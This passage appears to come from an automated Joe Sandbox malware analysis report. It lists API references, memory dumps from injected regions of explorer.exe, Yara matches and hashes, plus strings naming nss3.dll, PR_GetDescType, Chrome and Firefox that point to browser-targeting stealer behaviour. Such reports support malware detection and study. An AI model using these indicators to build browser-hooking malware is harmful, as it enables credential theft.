                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0E0AA37A
                                                                                                                                                                                                                          • Part of subcall function 0E09F0F5: _getptd_noexit.LIBCMT ref: 0E09F0F9
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0E0AA386
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0E0AA3AD
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692587166.000000000E080000.00000040.00000400.00020000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e080000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno$_getptd_noexit_invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID: 1
                                                                                                                                                                                                                        • API String ID: 28428206-2212294583
                                                                                                                                                                                                                        • Opcode ID: e9d95dec9c3dea56ffd5fce2e13d6af285bedd21f2ba0e29e4b36af891e3c234
                                                                                                                                                                                                                        • Instruction ID: 506b48ef9f566cf84339702f5a1d3d257edaf07f5165c14db06203181076e741
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e9d95dec9c3dea56ffd5fce2e13d6af285bedd21f2ba0e29e4b36af891e3c234
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4A214C31B2DACD8EE75A6BBC44843393AE5EB9B145F1C44E9E682CF196D9658C42C301
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0DFBE0E4: _getptd.LIBCMT ref: 0DFBE0F1
                                                                                                                                                                                                                          • Part of subcall function 0DFBE0E4: _inconsistency.LIBCMT ref: 0DFBE0FF
                                                                                                                                                                                                                          • Part of subcall function 0DFBE0E4: _getptd.LIBCMT ref: 0DFBE104
                                                                                                                                                                                                                          • Part of subcall function 0DFBE0E4: _inconsistency.LIBCMT ref: 0DFBE120
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 0DFCF58B
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0DFCF591
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0DFCF5A4
                                                                                                                                                                                                                          • Part of subcall function 0DFBE174: _getptd.LIBCMT ref: 0DFBE17D
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd$_inconsistency$DestructExceptionObject
                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                        • API String ID: 2821275340-1018135373
                                                                                                                                                                                                                        • Opcode ID: 62a835e0aba16e4851fd2400f9784127475756477d2fde903a95893cc5363edf
                                                                                                                                                                                                                        • Instruction ID: ade5cf35c5b79664b8eda738db9bad755f9450d112cc877e37024f05ace112c9
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 62a835e0aba16e4851fd2400f9784127475756477d2fde903a95893cc5363edf
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5BF0367294564289C734AF39D9402BC3365EB49B59F1AE939DF894A704DF20C9A1C341
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0E11E0E4: _getptd.LIBCMT ref: 0E11E0F1
                                                                                                                                                                                                                          • Part of subcall function 0E11E0E4: _inconsistency.LIBCMT ref: 0E11E0FF
                                                                                                                                                                                                                          • Part of subcall function 0E11E0E4: _getptd.LIBCMT ref: 0E11E104
                                                                                                                                                                                                                          • Part of subcall function 0E11E0E4: _inconsistency.LIBCMT ref: 0E11E120
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 0E12F58B
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0E12F591
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0E12F5A4
                                                                                                                                                                                                                          • Part of subcall function 0E11E174: _getptd.LIBCMT ref: 0E11E17D
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd$_inconsistency$DestructExceptionObject
                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                        • API String ID: 2821275340-1018135373
                                                                                                                                                                                                                        • Opcode ID: 62a835e0aba16e4851fd2400f9784127475756477d2fde903a95893cc5363edf
                                                                                                                                                                                                                        • Instruction ID: 6bd9d15e2f27c8509b166e6ee7ff9b31eb8259b8537d497294d7d9f8723687c2
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 62a835e0aba16e4851fd2400f9784127475756477d2fde903a95893cc5363edf
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E4F03C7274066189DB24EF71DC802AC23A4F74EB59F195939DE895B708DF30C8E2C381
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0FF5E0E4: _getptd.LIBCMT ref: 0FF5E0F1
                                                                                                                                                                                                                          • Part of subcall function 0FF5E0E4: _inconsistency.LIBCMT ref: 0FF5E0FF
                                                                                                                                                                                                                          • Part of subcall function 0FF5E0E4: _getptd.LIBCMT ref: 0FF5E104
                                                                                                                                                                                                                          • Part of subcall function 0FF5E0E4: _inconsistency.LIBCMT ref: 0FF5E120
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 0FF6F58B
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0FF6F591
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0FF6F5A4
                                                                                                                                                                                                                          • Part of subcall function 0FF5E174: _getptd.LIBCMT ref: 0FF5E17D
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd$_inconsistency$DestructExceptionObject
                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                        • API String ID: 2821275340-1018135373
                                                                                                                                                                                                                        • Opcode ID: 62a835e0aba16e4851fd2400f9784127475756477d2fde903a95893cc5363edf
                                                                                                                                                                                                                        • Instruction ID: 41402435e75e41aaeb5c836c5e153e72def74a3a8fa1c9eddef6fbcb45737eb1
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 62a835e0aba16e4851fd2400f9784127475756477d2fde903a95893cc5363edf
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 58F03C32A4068189CB24AF31EC802AC3368EB49F59F485932DE894A747EF24D995C341
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _callnewh.LIBCMT ref: 0DFBD20E
                                                                                                                                                                                                                        • malloc.LIBCMT ref: 0DFBD21A
                                                                                                                                                                                                                          • Part of subcall function 0DFBDB7C: _FF_MSGBANNER.LIBCMT ref: 0DFBDBAC
                                                                                                                                                                                                                          • Part of subcall function 0DFBDB7C: _NMSG_WRITE.LIBCMT ref: 0DFBDBB6
                                                                                                                                                                                                                          • Part of subcall function 0DFBDB7C: HeapAlloc.KERNEL32 ref: 0DFBDBD1
                                                                                                                                                                                                                          • Part of subcall function 0DFBDB7C: _callnewh.LIBCMT ref: 0DFBDBEA
                                                                                                                                                                                                                          • Part of subcall function 0DFBDB7C: _errno.LIBCMT ref: 0DFBDBF5
                                                                                                                                                                                                                          • Part of subcall function 0DFBDB7C: _errno.LIBCMT ref: 0DFBDC00
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0DFBD263
                                                                                                                                                                                                                          • Part of subcall function 0DFBDC3C: RtlPcToFileHeader.NTDLL ref: 0DFBDCCB
                                                                                                                                                                                                                          • Part of subcall function 0DFBDC3C: RaiseException.KERNEL32 ref: 0DFBDD0A
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Exception_callnewh_errno$AllocFileHeaderHeapRaiseThrowmalloc
                                                                                                                                                                                                                        • String ID: bad allocation
                                                                                                                                                                                                                        • API String ID: 1214304046-2104205924
                                                                                                                                                                                                                        • Opcode ID: 1144e60ed6f0a352bcf1b8ec71e5687a7bec389760c6cca63a2bd0904bf84be5
                                                                                                                                                                                                                        • Instruction ID: 39d468047bd6cc427dad7488c64099bf94cba6db894157e001e6d098506823f6
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1144e60ed6f0a352bcf1b8ec71e5687a7bec389760c6cca63a2bd0904bf84be5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 20F0B45560578B51EE20979ABC103E47355F788354F48C0259E8F0BB28EE38C159CB01
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _callnewh.LIBCMT ref: 0E11D20E
                                                                                                                                                                                                                        • malloc.LIBCMT ref: 0E11D21A
                                                                                                                                                                                                                          • Part of subcall function 0E11DB7C: _FF_MSGBANNER.LIBCMT ref: 0E11DBAC
                                                                                                                                                                                                                          • Part of subcall function 0E11DB7C: _NMSG_WRITE.LIBCMT ref: 0E11DBB6
                                                                                                                                                                                                                          • Part of subcall function 0E11DB7C: HeapAlloc.KERNEL32 ref: 0E11DBD1
                                                                                                                                                                                                                          • Part of subcall function 0E11DB7C: _callnewh.LIBCMT ref: 0E11DBEA
                                                                                                                                                                                                                          • Part of subcall function 0E11DB7C: _errno.LIBCMT ref: 0E11DBF5
                                                                                                                                                                                                                          • Part of subcall function 0E11DB7C: _errno.LIBCMT ref: 0E11DC00
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0E11D263
                                                                                                                                                                                                                          • Part of subcall function 0E11DC3C: RtlPcToFileHeader.NTDLL ref: 0E11DCCB
                                                                                                                                                                                                                          • Part of subcall function 0E11DC3C: RaiseException.KERNEL32 ref: 0E11DD0A
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Exception_callnewh_errno$AllocFileHeaderHeapRaiseThrowmalloc
                                                                                                                                                                                                                        • String ID: bad allocation
                                                                                                                                                                                                                        • API String ID: 1214304046-2104205924
                                                                                                                                                                                                                        • Opcode ID: 1144e60ed6f0a352bcf1b8ec71e5687a7bec389760c6cca63a2bd0904bf84be5
                                                                                                                                                                                                                        • Instruction ID: 5bb6a1193f151cc1ffcf29285aa43d28c4ef544f13672c8f277de07bd1895956
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1144e60ed6f0a352bcf1b8ec71e5687a7bec389760c6cca63a2bd0904bf84be5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6F0B47120178A52DE24DB61F4103956390F789344F480834C99D0BB68EF38C6C9CB01
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _callnewh.LIBCMT ref: 0FF5D20E
                                                                                                                                                                                                                        • malloc.LIBCMT ref: 0FF5D21A
                                                                                                                                                                                                                          • Part of subcall function 0FF5DB7C: _FF_MSGBANNER.LIBCMT ref: 0FF5DBAC
                                                                                                                                                                                                                          • Part of subcall function 0FF5DB7C: _NMSG_WRITE.LIBCMT ref: 0FF5DBB6
                                                                                                                                                                                                                          • Part of subcall function 0FF5DB7C: HeapAlloc.KERNEL32 ref: 0FF5DBD1
                                                                                                                                                                                                                          • Part of subcall function 0FF5DB7C: _callnewh.LIBCMT ref: 0FF5DBEA
                                                                                                                                                                                                                          • Part of subcall function 0FF5DB7C: _errno.LIBCMT ref: 0FF5DBF5
                                                                                                                                                                                                                          • Part of subcall function 0FF5DB7C: _errno.LIBCMT ref: 0FF5DC00
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0FF5D263
                                                                                                                                                                                                                          • Part of subcall function 0FF5DC3C: RtlPcToFileHeader.NTDLL ref: 0FF5DCCB
                                                                                                                                                                                                                          • Part of subcall function 0FF5DC3C: RaiseException.KERNEL32 ref: 0FF5DD0A
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Exception_callnewh_errno$AllocFileHeaderHeapRaiseThrowmalloc
                                                                                                                                                                                                                        • String ID: bad allocation
                                                                                                                                                                                                                        • API String ID: 1214304046-2104205924
                                                                                                                                                                                                                        • Opcode ID: 1144e60ed6f0a352bcf1b8ec71e5687a7bec389760c6cca63a2bd0904bf84be5
                                                                                                                                                                                                                        • Instruction ID: 4707b2cb696cf2102cdc1eed981a2ca4d9f6d2278e5609e3e6e96dfcc3814d56
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1144e60ed6f0a352bcf1b8ec71e5687a7bec389760c6cca63a2bd0904bf84be5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AFF0545160A74B51EF34E750B4507A9A354EB89744F4404359F8D4BF69EE7CD24ACB00
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0DFBAC00: RtlInitializeCriticalSection.NTDLL ref: 0DFBAC31
                                                                                                                                                                                                                          • Part of subcall function 0DFBAC00: RtlInitializeCriticalSection.NTDLL ref: 0DFBAC3E
                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32 ref: 0DFBAB8A
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 0DFBAB9A
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalInitializeSection$AddressLibraryLoadProc
                                                                                                                                                                                                                        • String ID: PR_GetDescType$nss3.dll
                                                                                                                                                                                                                        • API String ID: 1327063136-2530758152
                                                                                                                                                                                                                        • Opcode ID: 90ec8b6d16995e104318f8d6f93db4ea2d038876ffdd0efd53cb35dfc62aaaab
                                                                                                                                                                                                                        • Instruction ID: a671e2a95459436f070e1e9fa8052143d47551f6239fa767d15d0f1913463dc5
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 90ec8b6d16995e104318f8d6f93db4ea2d038876ffdd0efd53cb35dfc62aaaab
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 37F062A4912B07A1EA44DF9AE8513B83365F745794F45D027890B43274DE78C549C361
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0E11AC00: RtlInitializeCriticalSection.NTDLL ref: 0E11AC31
                                                                                                                                                                                                                          • Part of subcall function 0E11AC00: RtlInitializeCriticalSection.NTDLL ref: 0E11AC3E
                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32 ref: 0E11AB8A
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 0E11AB9A
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalInitializeSection$AddressLibraryLoadProc
                                                                                                                                                                                                                        • String ID: PR_GetDescType$nss3.dll
                                                                                                                                                                                                                        • API String ID: 1327063136-2530758152
                                                                                                                                                                                                                        • Opcode ID: 90ec8b6d16995e104318f8d6f93db4ea2d038876ffdd0efd53cb35dfc62aaaab
                                                                                                                                                                                                                        • Instruction ID: d68882f1c081634ad72da117e27ecd3588a9ba45d99983b37eb7cae8eb083ba1
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 90ec8b6d16995e104318f8d6f93db4ea2d038876ffdd0efd53cb35dfc62aaaab
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2AF0A4B4612A86A2EB08DB61F8413D423A0FB49B94F804813D90E233B1CF7CC6CAC350
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0FF5AC00: RtlInitializeCriticalSection.NTDLL ref: 0FF5AC31
                                                                                                                                                                                                                          • Part of subcall function 0FF5AC00: RtlInitializeCriticalSection.NTDLL ref: 0FF5AC3E
                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32 ref: 0FF5AB8A
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 0FF5AB9A
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalInitializeSection$AddressLibraryLoadProc
                                                                                                                                                                                                                        • String ID: PR_GetDescType$nss3.dll
                                                                                                                                                                                                                        • API String ID: 1327063136-2530758152
                                                                                                                                                                                                                        • Opcode ID: 90ec8b6d16995e104318f8d6f93db4ea2d038876ffdd0efd53cb35dfc62aaaab
                                                                                                                                                                                                                        • Instruction ID: c634d22d1b292e2395916faf278d42a6ad57bc815281866d4d64be0170bf1c8d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 90ec8b6d16995e104318f8d6f93db4ea2d038876ffdd0efd53cb35dfc62aaaab
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8BF07AB4A11B0B91EB24EF65E8853B42760FF45BC4F941232CA0A83A61DF7CD19BE350
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0DFA8900: HeapCreate.KERNEL32 ref: 0DFA891D
                                                                                                                                                                                                                          • Part of subcall function 0DFBC210: lstrcpyA.KERNEL32 ref: 0DFBC264
                                                                                                                                                                                                                        • RtlInitializeCriticalSection.NTDLL ref: 0DFBAC31
                                                                                                                                                                                                                        • RtlInitializeCriticalSection.NTDLL ref: 0DFBAC3E
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalInitializeSection$CreateHeaplstrcpy
                                                                                                                                                                                                                        • String ID: Chrome$Firefox
                                                                                                                                                                                                                        • API String ID: 3526404123-2335468407
                                                                                                                                                                                                                        • Opcode ID: f75b6d144aa2e89b2a0a7f3023aa869e0bfe81cb2fc528cef3ac5ed3374d85c2
                                                                                                                                                                                                                        • Instruction ID: cc9d7fe79d774ac3c07a6b917f74b546135ac8499fdbc59e48d3217a38987539
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f75b6d144aa2e89b2a0a7f3023aa869e0bfe81cb2fc528cef3ac5ed3374d85c2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BFE07E28911B03A0EA00BBD4FC843A433A5BB98789F818037C90B82270EF7C8659C7A0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0E108900: HeapCreate.KERNEL32 ref: 0E10891D
                                                                                                                                                                                                                          • Part of subcall function 0E11C210: lstrcpyA.KERNEL32 ref: 0E11C264
                                                                                                                                                                                                                        • RtlInitializeCriticalSection.NTDLL ref: 0E11AC31
                                                                                                                                                                                                                        • RtlInitializeCriticalSection.NTDLL ref: 0E11AC3E
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalInitializeSection$CreateHeaplstrcpy
                                                                                                                                                                                                                        • String ID: Chrome$Firefox
                                                                                                                                                                                                                        • API String ID: 3526404123-2335468407
                                                                                                                                                                                                                        • Opcode ID: f75b6d144aa2e89b2a0a7f3023aa869e0bfe81cb2fc528cef3ac5ed3374d85c2
                                                                                                                                                                                                                        • Instruction ID: 7669cea562b2a812abb39ba448804466c36118d74a4775dad49be6ee1b569b7e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f75b6d144aa2e89b2a0a7f3023aa869e0bfe81cb2fc528cef3ac5ed3374d85c2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8AE075B4A11FC195E608FB11F8543D423A4B758705F800812E509223B0DF788699C741
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0FF48900: HeapCreate.KERNEL32 ref: 0FF4891D
                                                                                                                                                                                                                          • Part of subcall function 0FF5C210: lstrcpyA.KERNEL32 ref: 0FF5C264
                                                                                                                                                                                                                        • RtlInitializeCriticalSection.NTDLL ref: 0FF5AC31
                                                                                                                                                                                                                        • RtlInitializeCriticalSection.NTDLL ref: 0FF5AC3E
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalInitializeSection$CreateHeaplstrcpy
                                                                                                                                                                                                                        • String ID: Chrome$Firefox
                                                                                                                                                                                                                        • API String ID: 3526404123-2335468407
                                                                                                                                                                                                                        • Opcode ID: f75b6d144aa2e89b2a0a7f3023aa869e0bfe81cb2fc528cef3ac5ed3374d85c2
                                                                                                                                                                                                                        • Instruction ID: 7aeb946acb9c07068a7ff710bebd53412e9a87eaf84bf65926f54834b5465567
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f75b6d144aa2e89b2a0a7f3023aa869e0bfe81cb2fc528cef3ac5ed3374d85c2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FDE0EA24511F4391EB20AB50FC943B476A4BB54BD5FC10135854942A61EF78819AE755
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrlenmallocmemcpy
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1128592954-0
                                                                                                                                                                                                                        • Opcode ID: 48088abaaf4411e3317b772e7716f931d4dff2bb768320eb294f86bc06f0b391
                                                                                                                                                                                                                        • Instruction ID: d57244860cb4866fa472a59ed02786abcf29cae415d2b547a23ee6c436e61db5
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 48088abaaf4411e3317b772e7716f931d4dff2bb768320eb294f86bc06f0b391
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C701AD2271979182EA549B5BF94432AA3E1EB8DFD0F089035DE4F43B28EE2CC5418B40
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
